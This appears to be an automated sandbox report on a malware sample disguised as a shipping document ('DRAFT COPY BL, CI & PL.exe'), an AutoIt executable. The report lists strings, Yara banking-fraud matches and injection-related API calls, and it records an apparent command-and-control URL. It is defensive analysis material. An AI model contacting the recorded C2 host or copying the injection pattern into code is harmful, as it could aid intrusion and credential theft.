69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.0000000005692000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000004E42000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
                Source: oFlOzErifOVgUf.exe, 00000005.00000002.3520891709.0000000001374000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ontherise.top
                Source: oFlOzErifOVgUf.exe, 00000005.00000002.3520891709.0000000001374000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ontherise.top/wr6c/
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.0000000004B94000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3522886189.0000000006900000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000004344000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2517818127.000000003C874000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: tzutil.exe, 00000006.00000002.3520285479.00000000032B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: tzutil.exe, 00000006.00000002.3520285479.00000000032C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: tzutil.exe, 00000006.00000002.3520285479.00000000032B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: tzutil.exe, 00000006.00000002.3520285479.00000000032B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: tzutil.exe, 00000006.00000002.3520285479.00000000032C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: tzutil.exe, 00000006.00000003.2402042935.0000000008325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009A4164
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009A4164
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009A3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009A3F66
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0099001C
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009BCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_009BCABC

                E-Banking Fraud

                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3520159967.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3520891709.0000000001320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3521394310.00000000042D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221510574.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221951172.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3520903347.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221199653.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3520852127.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00933B3A
                Source: DRAFT COPY BL, CI & PL.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: DRAFT COPY BL, CI & PL.exe, 00000000.00000000.1667352112.00000000009E4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_5045fea0-4
                Source: DRAFT COPY BL, CI & PL.exe, 00000000.00000000.1667352112.00000000009E4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_d937f087-a
                Source: DRAFT COPY BL, CI & PL.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_902d9ace-8
                Source: DRAFT COPY BL, CI & PL.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_9a95b495-6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C9E3 NtClose | 1_2_0042C9E3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72B60 NtClose,LdrInitializeThunk | 1_2_03C72B60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk | 1_2_03C72DF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk | 1_2_03C735C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C74340 NtSetContextThread | 1_2_03C74340
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C74650 NtSuspendThread | 1_2_03C74650
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72BE0 NtQueryValueKey | 1_2_03C72BE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72BF0 NtAllocateVirtualMemory | 1_2_03C72BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72B80 NtQueryInformationFile | 1_2_03C72B80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72BA0 NtEnumerateValueKey | 1_2_03C72BA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72AD0 NtReadFile | 1_2_03C72AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72AF0 NtWriteFile | 1_2_03C72AF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72AB0 NtWaitForSingleObject | 1_2_03C72AB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72FE0 NtCreateFile | 1_2_03C72FE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72F90 NtProtectVirtualMemory | 1_2_03C72F90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72FA0 NtQuerySection | 1_2_03C72FA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72FB0 NtResumeThread | 1_2_03C72FB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72F60 NtCreateProcessEx | 1_2_03C72F60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72F30 NtCreateSection | 1_2_03C72F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72EE0 NtQueueApcThread | 1_2_03C72EE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72E80 NtReadVirtualMemory | 1_2_03C72E80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72EA0 NtAdjustPrivilegesToken | 1_2_03C72EA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72E30 NtWriteVirtualMemory | 1_2_03C72E30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72DD0 NtDelayExecution | 1_2_03C72DD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72DB0 NtEnumerateKey | 1_2_03C72DB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72D00 NtSetInformationFile | 1_2_03C72D00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72D10 NtMapViewOfSection | 1_2_03C72D10
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72D30 NtUnmapViewOfSection | 1_2_03C72D30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72CC0 NtQueryVirtualMemory | 1_2_03C72CC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72CF0 NtOpenProcess | 1_2_03C72CF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72CA0 NtQueryInformationToken | 1_2_03C72CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72C60 NtCreateKey | 1_2_03C72C60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72C70 NtFreeVirtualMemory | 1_2_03C72C70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72C00 NtQueryInformationProcess | 1_2_03C72C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73090 NtSetValueKey | 1_2_03C73090
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73010 NtOpenDirectoryObject | 1_2_03C73010
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C739B0 NtGetContextThread | 1_2_03C739B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73D70 NtOpenThread | 1_2_03C73D70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73D10 NtOpenProcessToken | 1_2_03C73D10
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A4340 NtSetContextThread,LdrInitializeThunk | 6_2_039A4340
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A4650 NtSuspendThread,LdrInitializeThunk | 6_2_039A4650
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2BA0 NtEnumerateValueKey,LdrInitializeThunk | 6_2_039A2BA0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 6_2_039A2BF0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2BE0 NtQueryValueKey,LdrInitializeThunk | 6_2_039A2BE0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2B60 NtClose,LdrInitializeThunk | 6_2_039A2B60
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2AD0 NtReadFile,LdrInitializeThunk | 6_2_039A2AD0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2AF0 NtWriteFile,LdrInitializeThunk | 6_2_039A2AF0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2FB0 NtResumeThread,LdrInitializeThunk | 6_2_039A2FB0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2FE0 NtCreateFile,LdrInitializeThunk | 6_2_039A2FE0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2F30 NtCreateSection,LdrInitializeThunk | 6_2_039A2F30
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2E80 NtReadVirtualMemory,LdrInitializeThunk | 6_2_039A2E80
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2EE0 NtQueueApcThread,LdrInitializeThunk | 6_2_039A2EE0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2DD0 NtDelayExecution,LdrInitializeThunk | 6_2_039A2DD0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2DF0 NtQuerySystemInformation,LdrInitializeThunk | 6_2_039A2DF0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2D10 NtMapViewOfSection,LdrInitializeThunk | 6_2_039A2D10
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2D30 NtUnmapViewOfSection,LdrInitializeThunk | 6_2_039A2D30
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2CA0 NtQueryInformationToken,LdrInitializeThunk | 6_2_039A2CA0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2C70 NtFreeVirtualMemory,LdrInitializeThunk | 6_2_039A2C70
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2C60 NtCreateKey,LdrInitializeThunk | 6_2_039A2C60
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A35C0 NtCreateMutant,LdrInitializeThunk | 6_2_039A35C0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A39B0 NtGetContextThread,LdrInitializeThunk | 6_2_039A39B0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2B80 NtQueryInformationFile | 6_2_039A2B80
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2AB0 NtWaitForSingleObject | 6_2_039A2AB0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2F90 NtProtectVirtualMemory | 6_2_039A2F90
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2FA0 NtQuerySection | 6_2_039A2FA0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2F60 NtCreateProcessEx | 6_2_039A2F60
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2EA0 NtAdjustPrivilegesToken | 6_2_039A2EA0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2E30 NtWriteVirtualMemory | 6_2_039A2E30
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2DB0 NtEnumerateKey | 6_2_039A2DB0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2D00 NtSetInformationFile | 6_2_039A2D00
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2CC0 NtQueryVirtualMemory | 6_2_039A2CC0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2CF0 NtOpenProcess | 6_2_039A2CF0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A2C00 NtQueryInformationProcess | 6_2_039A2C00
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A3090 NtSetValueKey | 6_2_039A3090
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A3010 NtOpenDirectoryObject | 6_2_039A3010
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A3D10 NtOpenProcessToken | 6_2_039A3D10
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_039A3D70 NtOpenThread | 6_2_039A3D70
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_02F99680 NtDeleteFile | 6_2_02F99680
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_02F99720 NtClose | 6_2_02F99720
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_02F99420 NtCreateFile | 6_2_02F99420
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_02F99590 NtReadFile | 6_2_02F99590
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 6_2_02F99890 NtAllocateVirtualMemory | 6_2_02F99890
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_0099A1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle | 0_2_0099A1EF
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_00988310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_00988310
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: 0_2_009951BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 0_2_009951BD
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03988DBF6_2_03988DBF
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0397AD006_2_0397AD00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A0CD1F6_2_03A0CD1F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A10CB56_2_03A10CB5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03960CF26_2_03960CF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03970C006_2_03970C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039B739A6_2_039B739A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2132D6_2_03A2132D
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0395D34C6_2_0395D34C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039752A06_2_039752A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A112ED6_2_03A112ED
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0398B2C06_2_0398B2C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0398D2F06_2_0398D2F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0397B1B06_2_0397B1B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A3B16B6_2_03A3B16B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0395F1726_2_0395F172
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A516C6_2_039A516C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2F0E06_2_03A2F0E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A270E96_2_03A270E9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039770C06_2_039770C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A1F0CC6_2_03A1F0CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2F7B06_2_03A2F7B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A216CC6_2_03A216CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039B56306_2_039B5630
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A0D5B06_2_03A0D5B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A395C36_2_03A395C3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A275716_2_03A27571
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2F43F6_2_03A2F43F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039614606_2_03961460
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0398FB806_2_0398FB80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039ADBF96_2_039ADBF9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039E5BF06_2_039E5BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2FB766_2_03A2FB76
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A11AA36_2_03A11AA3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A0DAAC6_2_03A0DAAC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039B5AA06_2_039B5AA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A1DAC66_2_03A1DAC6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A27A466_2_03A27A46
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2FA496_2_03A2FA49
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039E3A6C6_2_039E3A6C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A059106_2_03A05910
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039799506_2_03979950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0398B9506_2_0398B950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039738E06_2_039738E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039DD8006_2_039DD800
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03971F926_2_03971F92
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2FFB16_2_03A2FFB1
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03933FD26_2_03933FD2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03933FD56_2_03933FD5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2FF096_2_03A2FF09
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03979EB06_2_03979EB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0398FDC06_2_0398FDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A27D736_2_03A27D73
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03973D406_2_03973D40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A21D5A6_2_03A21D5A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2FCF26_2_03A2FCF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039E9C326_2_039E9C32
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F81FA06_2_02F81FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F7CEA06_2_02F7CEA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F7B2106_2_02F7B210
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F7B20E6_2_02F7B20E
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F7B0C06_2_02F7B0C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F7D0C06_2_02F7D0C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F856406_2_02F85640
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F838506_2_02F83850
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F8384B6_2_02F8384B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F9BDC06_2_02F9BDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0377E2E56_2_0377E2E5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0377E79F6_2_0377E79F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0377E4066_2_0377E406
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0377CB036_2_0377CB03
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0377D8686_2_0377D868
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe | Code function: String function: 00958900 appears 42 times
